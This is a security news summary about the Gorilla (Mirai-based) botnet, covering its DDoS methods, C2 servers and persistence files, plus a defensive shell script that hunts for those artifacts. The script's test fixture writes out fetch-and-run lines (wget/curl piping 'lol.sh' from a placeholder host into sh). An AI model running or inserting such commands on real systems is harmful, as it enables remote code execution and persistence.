A newly discovered botnet malware family, known as Gorilla (or GorillaBot), has been driving a wave of DDoS attacks worldwide. This variant, built on the leaked Mirai botnet source code, has launched over 300,000 DDoS attacks across 100 countries, with China, the U.S., Canada, and Germany being the most targeted.
Gorilla Botnet: Capabilities and Tactics
The Gorilla Botnet employs various tactics to conduct devastating DDoS attacks. Its primary methods include UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. Because UDP is connectionless, the UDP-based floods can spoof arbitrary source IP addresses, generating large amounts of traffic that is hard to attribute or filter.
Technical Sophistication
Gorilla Botnet supports multiple CPU architectures, including ARM, MIPS, x86_64, and x86. On infection it connects to one of five predefined command-and-control (C2) servers and waits for DDoS commands. Notably, the botnet exploits a security flaw in Apache Hadoop YARN RPC for remote code execution, a vulnerability that has been abused in the wild since 2021.
Persistence and Evasion
To maintain persistence, Gorilla Botnet creates a service file named “custom.service” in the “/etc/systemd/system/” directory, configuring it to run automatically at system startup. Similar commands are added to “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files to download and run a shell script (“lol.sh”) from a remote server.
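The persistence artifacts above are concrete and file-based, so they can be hunted for on a live host or a mounted disk image. The following POSIX shell script is an added example (not from the original write-up or any vendor tooling): it reports the systemd unit by name and any line in the three boot/login files that references the dropper script. The sample filesystem tree it builds uses constructed placeholder values, not real indicators from the article.

```shell
#!/bin/sh
# Added example: read-only hunt for the Gorilla persistence artifacts named in
# the write-up. Run scan_persistence against "/" on a live host, or against the
# mount point of an image. It never modifies anything it finds.

# Print one "FINDING: ..." line per artifact present under $1 (default "/").
scan_persistence() {
    root="${1:-/}"
    unit="$root/etc/systemd/system/custom.service"
    if [ -f "$unit" ]; then
        echo "FINDING: systemd unit $unit exists"
        # Show what the unit launches so an analyst can triage at a glance.
        grep -n '^ExecStart' "$unit" 2>/dev/null | sed 's/^/    /'
    fi
    for rel in etc/inittab etc/profile boot/bootcmd; do
        f="$root/$rel"
        [ -f "$f" ] || continue
        if grep -q 'lol\.sh' "$f" 2>/dev/null; then
            echo "FINDING: $f references lol.sh"
            grep -n 'lol\.sh' "$f" | sed 's/^/    /'
        fi
    done
}

# Build a constructed sample tree (placeholder host, not a real indicator)
# so the scan can be exercised offline. Echoes the temporary root path.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/systemd/system" "$root/boot"
    cat > "$root/etc/systemd/system/custom.service" <<'EOF'
[Unit]
Description=custom

[Service]
ExecStart=/bin/sh /tmp/lol.sh

[Install]
WantedBy=multi-user.target
EOF
    # One benign line first, then a line of the kind the write-up describes.
    printf 'id:3:initdefault:\n::sysinit:/bin/sh -c "wget -O- http://REMOTE_HOST_PLACEHOLDER/lol.sh | sh"\n' > "$root/etc/inittab"
    printf 'export PATH=$PATH:/usr/local/bin\ncurl -s http://REMOTE_HOST_PLACEHOLDER/lol.sh | sh\n' > "$root/etc/profile"
    printf 'wget http://REMOTE_HOST_PLACEHOLDER/lol.sh -O /tmp/lol.sh; sh /tmp/lol.sh\n' > "$root/boot/bootcmd"
    echo "$root"
}

# A clean tree, to confirm the scan stays silent when nothing is present.
make_clean_root() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/systemd/system" "$root/boot"
    printf 'id:3:initdefault:\n' > "$root/etc/inittab"
    printf 'export PATH=$PATH:/usr/local/bin\n' > "$root/etc/profile"
    echo "$root"
}

# Demo run: ./hunt.sh --demo   (scans the constructed tree, then removes it)
if [ "${1:-}" = "--demo" ]; then
    sample=$(make_sample_root)
    scan_persistence "$sample"
    rm -rf "$sample"
fi
```

The unit name and file paths are taken from the write-up; because a legitimate administrator could also create a file called custom.service, treat the systemd hit as a lead to inspect (the ExecStart line printed under it) rather than as proof of infection on its own.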
Global Impact
Between September 4 and September 27, 2024, Gorilla Botnet issued an average of 20,000 commands daily, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors. This alarming rate highlights the urgent need for cybersecurity professionals to stay vigilant.
Mitigation Strategies
To combat Gorilla Botnet, organizations must prioritize:
1. Real-time threat intelligence
2. Advanced DDoS protection
3. Regular security updates and patches
4. Network segmentation and isolation
5. Continuous monitoring and incident response
The emergence of Gorilla Botnet underscores the evolving nature of cybersecurity threats. Staying informed and proactive is crucial in protecting against these sophisticated attacks.
Read more at: https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html?m=1